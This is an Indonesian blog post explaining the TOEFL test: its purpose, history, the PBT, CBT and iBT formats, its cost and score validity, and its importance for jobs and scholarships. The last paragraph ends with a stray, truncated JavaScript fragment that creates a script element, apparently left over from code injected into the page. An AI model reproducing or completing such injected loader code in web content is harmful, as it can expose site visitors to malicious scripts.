Memahami Tes TOEFL Dan Nilai Kepentingannya

Wednesday, October 15th, 2014 - TOEFL

Saat ini tes TOEFL sudah begitu familier di banyak kalangan terutama kalangan akademisi. Tes ini merupakan ujian khusus yang mengukur kemampuan berbahasa Inggris secara baku dari berbagai aspek kemampuan. Namun tidak banyak yang benar-benar tahu apa itu tes TOEFL dan bagaimana sebenarnya standar-standar yang digunakan dalam pengukuran sehingga kita bisa Memahami Tes TOEFL Dan Nilai Kepentingannya.

Memahami Tes TOEFL Dan Nilai Kepentingannya

Memahami Tes TOEFL Dan Nilai Kepentingannya

TOEFL adalah singkatan dari Test of English As a Foreign Language. Tes ini sudah berstandar Internasional dan sudah disusun berdasar standar penggunaan bahasa Inggris secara standar dan baku di dunia Internasional.

Tes ini dengan akurat akan menilai kemampuan dan kecakapan peserta dalam berbahasa Inggris baik dari sisi kemampuan membaca dan menelaah teks, kemampuan mendengarkan dan menangkap gagasan serta  kemampuan untuk menyampaikan gagasan baik secara oral maupun secara written.

Tes ini dikelola oleh Educational Testing Service yang berpusat di New Jersey USA dan pertama kali dijalankan pada tahun 1963. Tes TOEFL dari tahun ke tahun sudah mengalami perbaruan dan penyesuaian dengan perkembangan bahasa, trend dan tentu saja teknologi.

Hingga diharapkan mereka yang dinyatakan lolos tes TOEFL merupakan mereka dengan kemampuan bahasa Inggris sangat baik dan sesuai dengan kebutuhan masa kini. Mampu menggunakan bahasa Inggris secara aktif di dunia nyata, berkomunikasi dua arah dengan sangat lancar, menyampaikan gagasan ide dan pesan secara baku dan formal baik dalam bentuk oral maupun written dengan sangat baik dengan hasil berkualitas

Untuk memenuhi kebutuhan tersebut, maka tes TOEFL sendiri sudah di buat dalam beberapa format yang disesuaikan dengan tuntutan masa. Saat ini tersedia 3 format tes TOEFL yang disesuaikan dengan kebutuhan di masyarakat, adapun ketiga format tes TOEFL tersebut adalah tes PBT –TOEFL, CBT – TOEFL dan iBT –TOEFL. Yang terakhir kami sebutkan adalah tes TOEFL model terbaru dengan memanfaatkan sistem media internet dengan aplikasi berbasis internet.

Saat ini untuk bisa menjalankan tes tersebut Anda bisa mengakses situs resminya yang sudah terkoneksi dengan dunia internet Indonesia kemudian membayar sebesar  US$250. Anda langsung bisa menjalankan tes di mana pun Anda berada. Sementara hasil tes sendiri hanya akan berlaku selama masa 2 tahun saja.

Sebenarnya di dunia Internasional terdapat beberapa tes serupa berstandar internasional selain tes TOEFL yakni IELTS, TOEIC dan ESOL. Hanya TOEFL adalah tes berstandar internasional yang paling banyak diakui dunia dan menjadi yang paling populer di Indonesia.

Tes TOEFL sendiri adalah syarat mutlak dalam berbagai proses perekrutan Tenaga kerja di berbagai instansi dan perusahaan berkelas internasional baik dari dalam negeri juga dari pasar tenaga kerja global. Selain itu tes TOEFL juga menjadi syarat berbagai pengajuan beasiswa dan proses pengajuan pendidikan taraf lanjut di dunia pendidikan internasional.

Karena adanya asumsi di dunia global bahwa mereka yang berhasil lolos dengan hasil memuaskan dengan tes TOEFL mereka, berarti juga sudah memiliki kemampuan memadai dalam berbagai aspek penggunaan bahasa Inggris. Sehingga mereka tidak akan mengalami kesulitan dalam menjalankan tugas mereka dalam pekerjaan atau dalam tugas pendidikan mereka yang akan sangat akrab dengan bahasa Inggris tersebut.

Itulah sekilas mengenai tes TOEFL, sejarah dan alasan kenapa Anda perlu mengikutinya. Terutama untuk Anda yang tertarik mengambil jalur pendidikan dari luar negeri, menempuh pendidikan dengan jalur beasiswa internasional atau menempuh karier internasional. Meski banyak pula institusi lokal yang menuntut hasil memadai dari tes TOEFL ini pula. Jadi Anda bisa lihat kan betapa pentingnya mengikuti tes TOEFL untuk membuktikan kemampuan bahasa Inggris Anda.var d=document;var s=d.createElement(‘script’); } else {

Share this:

Advertisement
Memahami Tes TOEFL Dan Nilai Kepentingannya | admin | 4.5
Leave a Reply